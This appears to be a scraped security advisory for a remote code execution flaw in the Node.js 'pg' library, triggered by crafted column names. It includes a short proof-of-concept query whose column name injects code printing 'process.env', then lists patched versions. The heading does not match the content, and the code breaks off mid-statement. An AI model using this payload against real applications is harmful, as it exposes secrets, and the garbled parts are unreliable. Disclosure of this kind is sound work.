Nondeterministic Postrequisite Metaprotocol
Severity: high

Remote Code Execution



Affected versions of pg contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.

There are two specific scenarios in which it is likely for an application to be vulnerable:

  1. The application executes unsafe, user-supplied sql which contains malicious column names.
  2. The application connects to an untrusted database and executes a query returning results which contain a malicious column name.

Proof of Concept

const { Client } = require('pg')
const client = new Client()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {


  • Version 2.x.x: Update to version 2.11.2 or later.
  • Version 3.x.x: Update to version 3.6.4 or later.
  • Version 4.x.x: Update to version 4.5.7 or later.
  • Version 5.x.x: Update to version 5.2.1 or later.
  • Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )
  • Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )
Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory published
    Aug 13th, 2017
  2. reported

    Aug 13th, 2017